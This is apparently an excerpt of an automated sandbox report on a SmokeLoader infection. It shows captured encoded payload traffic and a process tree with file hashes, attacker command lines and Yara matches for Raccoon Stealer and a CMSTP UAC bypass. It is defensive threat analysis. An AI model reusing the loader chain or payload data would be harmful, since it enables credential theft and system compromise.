                                                            2021-10-29 18:11:00 UTC2863INData Raw: 20 4f 78 45 20 78 20 59 45 20 78 20 4f 6f 6f 20 78 20 6b 51 20 78 20 4b 74 20 78 20 6b 45 20 78 20 4b 51 20 78 20 4f 4f 59 20 78 20 59 52 20 78 20 74 4f 20 78 20 4f 4f 52 20 78 20 74 78 20 78 20 51 51 20 78 20 74 78 20 78 20 4f 4f 52 20 78 20 4f 78 74 20 78 20 59 4b 20 78 20 4f 78 4b 20 78 20 6b 78 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 4f 4f 4b 20 78 20 74 6f 20 78 20 59 45 20 78 20 4f 78 59 20 78 20 59 52 20 78 20 4f 6f 78 20 78 20 74 4f 20 78 20 74 52 20 78 20 6b 74 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 4f 4f 74 20 78 20 74 6b 20 78 20 4f 6f 78 20 78 20 59 78 20 78 20 6b 51 20 78 20 51 6b 20 78 20 6b 45 20 78 20 4f 4f 6f 20 78 20 4b 45 20 78 20 4f 78 78 20 78 20 4f 78 45 20 78 20 51 51 20 78 20 6b 6f 20 78 20 4f 6f 4f 20 78 20 6b 4f 20 78 20
                                                            Data Ascii: OxE x YE x Ooo x kQ x Kt x kE x KQ x OOY x YR x tO x OOR x tx x QQ x tx x OOR x Oxt x YK x OxK x kx x Oxk x Oxx x OOK x to x YE x OxY x YR x Oox x tO x tR x kt x tO x OOQ x OOt x tk x Oox x Yx x kQ x Qk x kE x OOo x KE x Oxx x OxE x QQ x ko x OoO x kO x
                                                            2021-10-29 18:11:00 UTC2867INData Raw: 78 20 74 4b 20 78 20 6b 78 20 78 20 6b 45 20 78 20 4f 6f 6f 20 78 20 4f 78 45 20 78 20 6b 4b 20 78 20 4f 78 6f 20 78 20 6b 4b 20 78 20 4f 4f 52 20 78 20 59 78 20 78 20 6b 45 20 78 20 4f 4f 51 20 78 20 4f 4f 6f 20 78 20 4f 78 59 20 78 20 74 6b 20 78 20 4f 4f 45 20 78 20 6b 74 20 78 20 6b 74 20 78 20 4f 78 4b 20 78 20 6b 45 20 78 20 6b 4f 20 78 20 4f 78 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 52 52 20 78 20 74 51 20 78 20 4f 4f 6b 20 78 20 4f 78 4b 20 78 20 4f 78 78 20 78 20 74 4f 20 78 20 6b 52 20 78 20 59 45 20 78 20 52 74 20 78 20 6b 78 20 78 20 6b 74 20 78 20 4f 4f 6f 20 78 20 4f 78 74 20 78 20 59 74 20 78 20 59 45 20 78 20 4f 4f 4b 20 78 20 51 51 20 78 20 6b 59 20 78 20 52 74 20 78 20 51 78 20 78 20 4f 78 6b 20 78 20 4f 4f 4b 20 78 20 4f 4f 6f 20 78
                                                            Data Ascii: x tK x kx x kE x Ooo x OxE x kK x Oxo x kK x OOR x Yx x kE x OOQ x OOo x OxY x tk x OOE x kt x kt x OxK x kE x kO x Oxk x Kt x Kt x RR x tQ x OOk x OxK x Oxx x tO x kR x YE x Rt x kx x kt x OOo x Oxt x Yt x YE x OOK x QQ x kY x Rt x Qx x Oxk x OOK x OOo x
                                                            2021-10-29 18:11:00 UTC2878INData Raw: 78 20 6b 59 20 78 20 4b 6b 20 78 20 52 51 20 78 20 4f 78 45 20 78 20 6b 52 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 52 20 78 20 51 78 20 78 20 6b 45 20 78 20 52 52 20 78 20 6b 4b 20 78 20 4f 78 78 20 78 20 74 4f 20 78 20 74 78 20 78 20 4f 4f 52 20 78 20 51 51 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 74 20 78 20 51 78 20 78 20 4f 6f 4f 20 78 20 52 52 20 78 20 6b 4b 20 78 20 51 74 20 78 20 6b 74 20 78 20 4f 78 78 20 78 20 4f 4f 74 20 78 20 51 78 20 78 20 6b 6b 20 78 20 74 45 20 78 20 4f 78 45 20 78 20 74 45 20 78 20 4f 6f 6f 20 78 20 52 51 20 78 20 4f 4f 51 20 78 20 4f 78 45 20 78 20 4f 78 45 20 78 20 74 45 20 78 20 4f 78 59 20 78 20 74 74 20 78 20 52 59 20 78 20 4b 6b 20 78 20 74 4f 20 78 20 52 74 20 78 20 6b 45 20 78 20 4f 4f 45 20 78 20 74
                                                            Data Ascii: x kY x Kk x RQ x OxE x kR x tO x Oxk x OOR x Qx x kE x RR x kK x Oxx x tO x tx x OOR x QQ x tO x Oxk x OOt x Qx x OoO x RR x kK x Qt x kt x Oxx x OOt x Qx x kk x tE x OxE x tE x Ooo x RQ x OOQ x OxE x OxE x tE x OxY x tt x RY x Kk x tO x Rt x kE x OOE x t
                                                            2021-10-29 18:11:00 UTC2883INData Raw: 78 20 74 6b 20 78 20 6b 52 20 78 20 74 6f 20 78 20 6b 6f 20 78 20 74 74 20 78 20 52 52 20 78 20 52 59 20 78 20 4f 78 6f 20 78 20 59 52 20 78 20 52 51 20 78 20 52 59 20 78 20 4f 78 52 20 78 20 52 59 20 78 20 52 59 20 78 20 74 74 20 78 20 52 52 20 78 20 6b 51 20 78 20 74 4f 20 78 20 52 59 20 78 20 4b 51 20 78 20 6b 59 20 78 20 4f 78 78 20 78 20 74 4b 20 78 20 6b 4f 20 78 20 52 51 20 78 20 52 52 20 78 20 4b 74 20 78 20 4f 4f 51 20 78 20 6b 4f 20 78 20 74 74 20 78 20 74 74 20 78 20 52 59 20 78 20 4f 4f 4f 20 78 20 74 4f 20 78 20 52 74 20 78 20 52 74 20 78 20 4f 4f 59 20 78 20 74 4f 20 78 20 52 59 20 78 20 6b 4f 20 78 20 6b 59 20 78 20 74 78 20 78 20 52 52 20 78 20 4f 4f 51 20 78 20 74 74 20 78 20 74 45 20 78 20 74 74 20 78 20 52 51 20 78 20 52 59 20 78 20 74
                                                            Data Ascii: x tk x kR x to x ko x tt x RR x RY x Oxo x YR x RQ x RY x OxR x RY x RY x tt x RR x kQ x tO x RY x KQ x kY x Oxx x tK x kO x RQ x RR x Kt x OOQ x kO x tt x tt x RY x OOO x tO x Rt x Rt x OOY x tO x RY x kO x kY x tx x RR x OOQ x tt x tE x tt x RQ x RY x t
                                                            2021-10-29 18:11:00 UTC2899INData Raw: 20 6b 74 20 78 20 6b 78 20 78 20 4f 4f 78 20 78 20 51 51 20 78 20 52 51 20 78 20 4f 4f 6b 20 78 20 52 59 20 78 20 6b 4f 20 78 20 59 78 20 78 20 4f 4f 52 20 78 20 4f 78 4f 20 78 20 4f 78 78 20 78 20 59 4f 20 78 20 4f 6f 4f 20 78 20 59 45 20 78 20 4f 4f 51 20 78 20 4f 4f 74 20 78 20 4f 78 52 20 78 20 6b 45 20 78 20 74 74 20 78 20 6b 51 20 78 20 4f 4f 74 20 78 20 51 74 20 78 20 6b 78 20 78 20 52 74 20 78 20 6b 6f 20 78 20 4f 6f 78 20 78 20 59 4f 20 78 20 4f 4f 51 20 78 20 6b 6b 20 78 20 4f 78 78 20 78 20 51 74 20 78 20 4f 78 4b 20 78 20 51 51 20 78 20 4b 51 20 78 20 51 51 20 78 20 74 78 20 78 20 51 74 20 78 20 74 4b 20 78 20 4f 4f 45 20 78 20 4f 4f 78 20 78 20 4f 6f 4f 20 78 20 6b 4b 20 78 20 4f 78 78 20 78 20 4f 78 6b 20 78 20 74 6f 20 78 20 51 6b 20 78 20
                                                            Data Ascii: kt x kx x OOx x QQ x RQ x OOk x RY x kO x Yx x OOR x OxO x Oxx x YO x OoO x YE x OOQ x OOt x OxR x kE x tt x kQ x OOt x Qt x kx x Rt x ko x Oox x YO x OOQ x kk x Oxx x Qt x OxK x QQ x KQ x QQ x tx x Qt x tK x OOE x OOx x OoO x kK x Oxx x Oxk x to x Qk x
                                                            2021-10-29 18:11:00 UTC2910INData Raw: 20 78 20 4f 6f 4f 20 78 20 4f 78 45 20 78 20 51 51 20 78 20 4f 4f 4f 20 78 20 45 74 20 78 20 4f 4f 6f 20 78 20 45 74 20 78 20 4f 4f 78 20 78 20 4f 4f 4f 20 78 20 51 74 20 78 20 4f 78 4f 20 78 20 4f 4f 6b 20 78 20 4f 4f 6f 20 78 20 4f 78 74 20 78 20 4f 4f 51 20 78 20 4f 4f 4b 20 78 20 4f 4f 4b 20 78 20 4f 4f 4b 20 78 20 51 51 20 78 20 4f 78 6f 20 78 20 45 74 20 78 20 45 6f 20 78 20 45 74 20 78 20 4f 4f 78 20 78 20 4f 4f 6f 20 78 20 4f 78 6f 20 78 20 4f 78 74 20 78 20 4f 4f 59 20 78 20 4f 78 78 20 78 20 45 74 20 78 20 4f 4f 51 20 78 20 45 74 20 78 20 4f 78 6b 20 78 20 4f 78 52 20 78 20 51 51 20 78 20 4f 4f 4f 20 78 20 4f 4f 78 20 78 20 4f 78 4f 20 78 20 4f 4f 6f 20 78 20 4f 78 4b 20 78 20 45 74 20 78 20 4f 78 59 20 78 20 45 74 20 78 20 4f 4f 59 20 78 20 4f
                                                            Data Ascii: x OoO x OxE x QQ x OOO x Et x OOo x Et x OOx x OOO x Qt x OxO x OOk x OOo x Oxt x OOQ x OOK x OOK x OOK x QQ x Oxo x Et x Eo x Et x OOx x OOo x Oxo x Oxt x OOY x Oxx x Et x OOQ x Et x Oxk x OxR x QQ x OOO x OOx x OxO x OOo x OxK x Et x OxY x Et x OOY x O
                                                            2021-10-29 18:11:00 UTC2926INData Raw: 20 78 20 4f 78 20 78 20 45 74 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 4f 4f 6f 20 78 20 4f 78 78 20 78 20 51 6b 20 78 20 4f 78 78 20 78 20 4f 6f 6f 20 78 20 4f 78 59 20 78 20 4f 4f 51 20 78 20 4f 4f 74 20 78 20 51 6b 20 78 20 51 6b 20 78 20 4f 4f 6b 20 78 20 45 74 20 78 20 4f 4f 59 20 78 20 45 74 20 78 20 4f 78 78 20 78 20 4f 6f 6f 20 78 20 4f 6f 4f 20 78 20 45 74 20 78 20 51 51 20 78 20 45 74 20 78 20 4f 4f 6b 20 78 20 4f 78 4b 20 78 20 4f 6f 6f 20 78 20 4f 4f 6f 20 78 20 4f 4f 51 20 78 20 4f 78 59 20 78 20 4f 4f 51 20 78 20 4f 78 52 20 78 20 4f 78 51 20 78 20 4f 4f 74 20 78 20 4f 4f 59 20 78 20 4f 78 59 20 78 20 45 74 20 78 20 45 6f 20 78 20 45 74 20 78 20 4f 78 74 20 78 20 4f 4f 4f 20 78 20 4f 6f 4f 20 78 20 4f 78 52 20 78 20 4f 4f 6f 20 78 20 4f 4f
                                                            Data Ascii: x Ox x Et x Qt x OxE x OOo x Oxx x Qk x Oxx x Ooo x OxY x OOQ x OOt x Qk x Qk x OOk x Et x OOY x Et x Oxx x Ooo x OoO x Et x QQ x Et x OOk x OxK x Ooo x OOo x OOQ x OxY x OOQ x OxR x OxQ x OOt x OOY x OxY x Et x Eo x Et x Oxt x OOO x OoO x OxR x OOo x OO
                                                            2021-10-29 18:11:00 UTC2942INData Raw: 20 78 20 4f 4f 6b 20 78 20 4f 78 4b 20 78 20 51 6b 20 78 20 4f 78 52 20 78 20 4f 4f 4b 20 78 20 4f 78 52 20 78 20 4f 78 4f 20 78 20 4f 78 6f 20 78 20 45 74 20 78 20 4f 4f 4f 20 78 20 45 74 20 78 20 4f 4f 52 20 78 20 4f 78 4b 20 78 20 4f 78 45 20 78 20 4f 4f 6f 20 78 20 51 51 20 78 20 4f 78 6b 20 78 20 4f 4f 45 20 78 20 4f 78 45 20 78 20 51 6b 20 78 20 4f 6f 4f 20 78 20 4f 4f 6b 20 78 20 4f 78 51 20 78 20 4f 4f 51 20 78 20 45 74 20 78 20 4f 4f 59 20 78 20 45 74 20 78 20 4f 6f 78 20 78 20 4f 4f 51 20 78 20 4f 78 4b 20 78 20 4f 78 52 20 78 20 4f 78 6b 20 78 20 4f 4f 74 20 78 20 4f 4f 74 20 78 20 51 6b 20 78 20 51 6b 20 78 20 4f 78 59 20 78 20 45 74 20 78 20 4f 4f 52 20 78 20 45 74 20 78 20 4f 4f 52 20 78 20 4f 78 45 20 78 20 51 51 20 78 20 4f 78 52 20 78 20
                                                            Data Ascii: x OOk x OxK x Qk x OxR x OOK x OxR x OxO x Oxo x Et x OOO x Et x OOR x OxK x OxE x OOo x QQ x Oxk x OOE x OxE x Qk x OoO x OOk x OxQ x OOQ x Et x OOY x Et x Oox x OOQ x OxK x OxR x Oxk x OOt x OOt x Qk x Qk x OxY x Et x OOR x Et x OOR x OxE x QQ x OxR x
                                                            2021-10-29 18:11:00 UTC2958INData Raw: 78 20 4f 78 6b 20 78 20 4f 78 4f 20 78 20 74 52 20 78 20 6b 59 20 78 20 52 59 20 78 20 78 20 4f 78 59 20 6b 45 20 78 20 74 51 20 78 20 74 78 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 52 59 20 78 20 6b 6f 20 78 20 52 51 20 78 20 51 6f 20 78 20 74 74 20 78 20 4f 78 59 20 78 20 51 51 20 78 20 4f 4f 4b 20 78 20 4f 4f 4f 20 78 20 4f 4f 59 20 78 20 4f 4f 4f 20 78 20 4f 78 6f 20 78 20 4f 4f 52 20 78 20 51 6f 20 78 20 6b 74 20 78 20 4f 78 59 20 78 20 4f 4f 78 20 78 20 4f 78 78 20 78 20 4f 4f 4f 20 78 20 4f 4f 51 20 78 20 4f 4f 59 20 78 20 45 6f 20 78 20 52 6b 20 78 20 4f 78 4f 20 78 20 4f 78 6f 20 78 20 4f 78 4f 20 78 20 4f 4f 78 20 78 20 4f 78 78 20 78 20 4f 78 4f 20 78 20 4f 4f 4b 20 78 20 51 6f 20 78 20 52 51 20 78 20 4f 6f 78 20 78 20 51 51 20 78 20 4f 78 6b 20
                                                            Data Ascii: x Oxk x OxO x tR x kY x RY x x OxY kE x tQ x tx x kK x kt x RY x ko x RQ x Qo x tt x OxY x QQ x OOK x OOO x OOY x OOO x Oxo x OOR x Qo x kt x OxY x OOx x Oxx x OOO x OOQ x OOY x Eo x Rk x OxO x Oxo x OxO x OOx x Oxx x OxO x OOK x Qo x RQ x Oox x QQ x Oxk
                                                            2021-10-29 18:11:00 UTC2974INData Raw: 20 78 20 45 6f 20 78 20 4f 78 51 20 78 20 4f 78 59 20 78 20 4f 4f 59 20 78 20 4f 78 51 20 78 20 51 74 20 78 20 4f 4f 52 20 78 20 51 51 20 78 20 4f 78 4b 20 78 20 45 6f 20 78 20 51 6b 20 78 20 4f 78 4f 20 78 20 4f 4f 52 20 78 20 4f 4f 51 20 78 20 4f 78 4f 20 78 20 4f 78 4f 20 78 20 4f 4f 78 20 78 20 45 6f 20 78 20 4f 4f 52 20 78 20 4f 78 4b 20 78 20 4f 78 4f 20 78 20 45 6f 20 78 20 4f 4f 52 20 78 20 4f 6f 4f 20 78 20 4f 4f 6f 20 78 20 4f 78 4f 20 78 20 45 6f 20 78 20 4f 4f 4f 20 78 20 4f 78 6f 20 78 20 45 6f 20 78 20 4f 4f 4f 20 78 20 51 6b 20 78 20 4f 78 52 20 78 20 4f 78 4f 20 78 20 51 51 20 78 20 4f 4f 52 20 78 20 45 6f 20 78 20 4f 4f 52 20 78 20 4f 78 4b 20 78 20 51 74 20 78 20 4f 4f 52 20 78 20 45 6f 20 78 20 4f 78 59 20 78 20 4f 4f 59 20 78 20 45 6f
                                                            Data Ascii: x Eo x OxQ x OxY x OOY x OxQ x Qt x OOR x QQ x OxK x Eo x Qk x OxO x OOR x OOQ x OxO x OxO x OOx x Eo x OOR x OxK x OxO x Eo x OOR x OoO x OOo x OxO x Eo x OOO x Oxo x Eo x OOO x Qk x OxR x OxO x QQ x OOR x Eo x OOR x OxK x Qt x OOR x Eo x OxY x OOY x Eo
                                                            2021-10-29 18:11:00 UTC2990INData Raw: 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20
                                                            Data Ascii: x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x


                                                            Code Manipulations

                                                            Statistics

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Start time:20:09:24
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\Desktop\cnv622JnZv.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\cnv622JnZv.exe'
                                                            Imagebase:0x400000
                                                            File size:345088 bytes
                                                            MD5 hash:5AE3B69C31FE729AC672BA483280F16D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low

                                                            General

                                                            Start time:20:09:29
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\Desktop\cnv622JnZv.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\cnv622JnZv.exe'
                                                            Imagebase:0x400000
                                                            File size:345088 bytes
                                                            MD5 hash:5AE3B69C31FE729AC672BA483280F16D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.320318511.0000000001F51000.00000004.00020000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.320173015.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            General

                                                            Start time:20:09:36
                                                            Start date:29/10/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff693d90000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000000.302632865.0000000004F61000.00000020.00020000.sdmp, Author: Joe Security
                                                            Reputation:high

                                                            General

                                                            Start time:20:10:12
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Roaming\jejhieg
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\jejhieg
                                                            Imagebase:0x400000
                                                            File size:345088 bytes
                                                            MD5 hash:5AE3B69C31FE729AC672BA483280F16D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low

                                                            General

                                                            Start time:20:10:13
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\C5EA.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\C5EA.exe
                                                            Imagebase:0x400000
                                                            File size:344064 bytes
                                                            MD5 hash:3B947ED5AABDD775B1AFC31A5C4D39A0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low

                                                            General

                                                            Start time:20:10:20
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\C5EA.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\C5EA.exe
                                                            Imagebase:0x400000
                                                            File size:344064 bytes
                                                            MD5 hash:3B947ED5AABDD775B1AFC31A5C4D39A0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.379053476.00000000004A0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.379166058.0000000001F61000.00000004.00020000.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            General

                                                            Start time:20:10:21
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Roaming\jejhieg
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\jejhieg
                                                            Imagebase:0x400000
                                                            File size:345088 bytes
                                                            MD5 hash:5AE3B69C31FE729AC672BA483280F16D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low

                                                            General

                                                            Start time:20:10:34
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\66A4.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\66A4.exe
                                                            Imagebase:0xd70000
                                                            File size:512512 bytes
                                                            MD5 hash:F57B28AEC65D4691202B9524F84CC54A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\66A4.exe, Author: Florian Roth
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 39%, ReversingLabs
                                                            Reputation:low

                                                            General

                                                            Start time:20:10:39
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\77DC.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\77DC.exe
                                                            Imagebase:0xa50000
                                                            File size:512952 bytes
                                                            MD5 hash:42758E2569239A774BECDB12698B124C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\77DC.exe, Author: Florian Roth
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low

                                                            General

                                                            Start time:20:10:42
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\8615.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\8615.exe
                                                            Imagebase:0x400000
                                                            File size:212992 bytes
                                                            MD5 hash:73252ACB344040DDC5D9CE78A5D3A4C2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000018.00000002.440048320.0000000002FD0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000018.00000002.440144777.0000000002FF1000.00000004.00020000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000018.00000003.423422124.0000000002FC0000.00000004.00000001.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 80%, ReversingLabs
                                                            Reputation:moderate

                                                            General

                                                            Start time:20:10:46
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                            Imagebase:0x400000
                                                            File size:91000 bytes
                                                            MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 3%, Metadefender, Browse
                                                            • Detection: 0%, ReversingLabs
                                                            Reputation:moderate

                                                            General

                                                            Start time:20:10:46
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\977B.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\977B.exe
                                                            Imagebase:0x8d0000
                                                            File size:859648 bytes
                                                            MD5 hash:AB823DF932B3C2941A9015848EBDB97B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low

                                                            General

                                                            Start time:20:10:49
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\A557.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\A557.exe
                                                            Imagebase:0x2d0000
                                                            File size:161280 bytes
                                                            MD5 hash:9FA070AF1ED2E1F07ED8C9F6EB2BDD29
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\A557.exe, Author: Florian Roth
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 43%, ReversingLabs
                                                            Reputation:moderate

                                                            General

                                                            Start time:20:10:49
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /SpecialRun 4101d8 4380
                                                            Imagebase:0x400000
                                                            File size:91000 bytes
                                                            MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:20:10:52
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\B084.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\B084.exe
                                                            Imagebase:0x7ff64e5e0000
                                                            File size:347136 bytes
                                                            MD5 hash:31BE6099D31BDBF1ED339EFFDC1C7064
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000021.00000002.465682057.00000000047F1000.00000004.00020000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000021.00000002.464888081.0000000002B70000.00000004.00000001.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            General

                                                            Start time:20:10:55
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\977B.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:977B.exe
                                                            Imagebase:0x700000
                                                            File size:859648 bytes
                                                            MD5 hash:AB823DF932B3C2941A9015848EBDB97B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low

                                                            General

                                                            Start time:20:10:57
                                                            Start date:29/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\152F.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\152F.exe
                                                            Imagebase:0x400000
                                                            File size:600064 bytes
                                                            MD5 hash:0EFD1C9D005446AEF5FEE4EB512F5887
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000023.00000003.460198021.00000000048F0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000023.00000002.593634201.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

                                                            Disassembly

                                                            Code Analysis

